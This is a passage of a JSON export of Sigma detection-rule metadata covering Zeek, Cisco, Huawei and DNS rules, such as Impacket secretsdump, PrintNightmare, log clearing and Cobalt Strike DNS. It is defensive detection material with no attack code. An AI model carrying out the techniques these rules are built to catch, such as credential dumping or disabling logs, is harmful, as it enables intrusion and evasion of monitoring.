(Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." ], "filename": "zeek_http_omigod_no_auth_rce.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://twitter.com/neu5ron/status/1438987292971053057?s=20", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.execution", "attack.lateral-movement", "attack.t1068", "attack.t1190", "attack.t1203", "attack.t1021.006", "attack.t1210" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", "value": "OMIGOD HTTP No Authentication RCE" }, { "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", "meta": { "author": "Samir Bousseaden, @neu5ron", "creation_date": "2020-03-19", "falsepositive": [ "Unknown" ], "filename": "zeek_smb_converted_win_impacket_secretdump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.004", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "value": "Possible Impacket SecretDump Remote Activity - Zeek" }, { "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", "meta": { "author": "@neu5ron (Nate Guagenti)", "creation_date": "2021-08-23", "falsepositive": [ "Legitimate remote alteration of a printer driver." ], "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://github.com/corelight/CVE-2021-1675", "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ "attack.execution", "cve.2021-1678", "cve.2021-1675", "cve.2021-34527" ] }, "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", "value": "Possible PrintNightmare Print Driver Install" }, { "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", "meta": { "author": "@neu5ron, SOC Prime Team, Corelight", "creation_date": "2021-05-04", "falsepositive": [ "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" ], "filename": "zeek_dns_susp_zbit_flag.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://tools.ietf.org/html/rfc2929#section-2.1", "https://twitter.com/neu5ron/status/1346245602502443009", "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ "attack.t1095", "attack.t1571", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "value": "Suspicious DNS Z Flag Bit Set" }, { "description": "Detects known sensitive file extensions via Zeek", "meta": { "author": "Samir Bousseaden, @neu5ron", "creation_date": "2020-04-02", "falsepositive": [ "Help Desk operator doing backup or re-imaging end user machine or backup software", "Users working with these data types or exchanging message files" ], "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" ], "tags": [ "attack.collection" ] }, "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", "value": "Suspicious Access to Sensitive File Extensions - Zeek" }, { "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", "meta": { "author": "@neu5ron, SOC Prime", "creation_date": "2020-03-19", "falsepositive": [ "Windows administrator tasks or troubleshooting", "Windows management scripts or software" ], "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1053.002", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "value": "MITRE BZAR Indicators for Execution" }, { "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", "meta": { "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", "creation_date": "2021-08-19", "falsepositive": [ "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." ], "filename": "zeek_dns_mining_pools.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", "value": "DNS Events Related To Mining Pools" }, { "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "meta": { "author": "OTR (Open Threat Research), @neu5ron", "creation_date": "2018-11-28", "falsepositive": [ "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" ], "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", "value": "SMB Spoolss Name Piped Usage" }, { "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. Except due to misconfigurations" ], "filename": "cisco_bgp_md5_auth_failed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56fa3cd6-f8d6-4520-a8c7-607292971886", "value": "Cisco BGP Authentication Failures" }, { "description": "Find local accounts being created or modified as well as remote authentication configurations", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "When remote authentication is in place, this should not change often" ], "filename": "cisco_cli_local_accounts.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" ], "tags": [ "attack.persistence", "attack.t1136.001", "attack.t1098" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", "value": "Cisco Local Accounts" }, { "description": "Collect pertinent data from the configuration files", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Commonly run by administrators" ], "filename": "cisco_cli_collect_data.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm", "https://blog.router-switch.com/2013/11/show-running-config/", "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.collection", "attack.t1087.001", "attack.t1552.001", "attack.t1005" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", "value": "Cisco Collect Data" }, { "description": "Show when private keys are being exported from the device, or when new certificates are installed", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Not commonly run by administrators. Also whitelist your known good certificates" ], "filename": "cisco_cli_crypto_actions.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.t1553.004", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", "value": "Cisco Crypto Commands" }, { "description": "Clear command history in network OS which is used for defense evasion", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Legitimate administrators may run these commands" ], "filename": "cisco_cli_clear_logs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html", "https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", "value": "Cisco Clear Logs" }, { "description": "See what files are being deleted from flash file systems", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Will be used sometimes by admins to clean up local flash space" ], "filename": "cisco_cli_file_deletion.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1070.004", "attack.t1561.001", "attack.t1561.002" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0af0ca99-357d-4ba1-805f-674fdfb7bef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", "value": "Cisco File Deletion" }, { "description": "Show when a monitor or a span/rspan is setup or modified", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Admins may setup new or modify old spans, or use a monitor for troubleshooting" ], "filename": "cisco_cli_net_sniff.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", "value": "Cisco Sniffing" }, { "description": "Find information about network devices that is not stored in config files", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Commonly used by administrators for troubleshooting" ], "filename": "cisco_cli_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083", "attack.t1201", "attack.t1057", "attack.t1018", "attack.t1082", "attack.t1016", "attack.t1049", "attack.t1033", "attack.t1124" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", "value": "Cisco Discovery" }, { "description": "See what commands are being input into the device by other people, full credentials can be in the history", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Not commonly run by administrators, especially if remote logging is configured" ], "filename": "cisco_cli_input_capture.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" ], "tags": [ "attack.credential-access", "attack.t1552.003" ] }, "related": [ { "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "value": "Cisco Show Commands Input" }, { "description": "Modifications to a config that will serve an adversary's impacts or persistence", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Legitimate administrators may run these commands" ], "filename": "cisco_cli_modify_config.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" ], "tags": [ "attack.persistence", "attack.impact", "attack.t1490", "attack.t1505", "attack.t1565.002", "attack.t1053" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d456de47-a16f-4e46-8980-e67478a12dcb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d0613359-5781-4fd2-b5be-c269270be1f6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", "value": "Cisco Modify Configuration" }, { "description": "Various protocols maybe used to put data on the device for exfil or infil", "meta": { "author": "Austin Clark", "creation_date": "2019-08-12", "falsepositive": [ "Generally used to copy configs or IOS images" ], "filename": "cisco_cli_moving_data.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" ], "tags": [ "attack.collection", "attack.lateral-movement", "attack.command-and-control", "attack.exfiltration", "attack.t1074", "attack.t1105", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "value": "Cisco Stage Data" }, { "description": "Detect a system being shutdown or put into different boot mode", "meta": { "author": "Austin Clark", "creation_date": "2019-08-15", "falsepositive": [ "Legitimate administrators may run these commands, though rarely." ], "filename": "cisco_cli_dos.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" ], "tags": [ "attack.impact", "attack.t1495", "attack.t1529", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", "value": "Cisco Denial of Service" }, { "description": "Turn off logging locally or remote", "meta": { "author": "Austin Clark", "creation_date": "2019-08-11", "falsepositive": [ "Unknown" ], "filename": "cisco_cli_disable_logging.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", "value": "Cisco Disabling Logging" }, { "description": "Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. Except due to misconfigurations" ], "filename": "cisco_ldp_md5_auth_failed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50e606bf-04ce-4ca7-9d54-3449494bbd4b", "value": "Cisco LDP Authentication Failures" }, { "description": "Detects BGP failures which may be indicative of brute force attacks to manipulate routing.", "meta": { "author": "Tim Brown", "creation_date": "2023-01-09", "falsepositive": [ "Unlikely. Except due to misconfigurations" ], "filename": "huawei_bgp_auth_failed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "huawei", "refs": [ "https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/huawei/bgp/huawei_bgp_auth_failed.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.credential-access", "attack.collection", "attack.t1078", "attack.t1110", "attack.t1557" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a557ffe6-ac54-43d2-ae69-158027082350", "value": "Huawei BGP Authentication Failures" }, { "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", "meta": { "author": "Florian Roth (Nextron Systems), Matt Kelly (list of domains)", "creation_date": "2022-06-07", "falsepositive": [ "Unknown" ], "filename": "net_dns_external_service_interaction_domains.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://twitter.com/breakersall/status/1533493587828260866", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.reconnaissance", "attack.t1595.002" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", "value": "DNS Query to External Service Interaction Domains" }, { "description": "Detects wannacry killswitch domain dns queries", "meta": { "author": "Mike Wade", "creation_date": "2020-09-16", "falsepositive": [ "Analyst testing" ], "filename": "net_dns_wannacry_killswitch_domain.yml", "level": "high", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", "value": "Wannacry Killswitch Domain" }, { "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-05-10", "falsepositive": [ "Unknown" ], "filename": "net_dns_mal_cobaltstrike.yml", "level": "critical", "logsource.category": "dns", "logsource.product": "No established product", "refs": [ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", 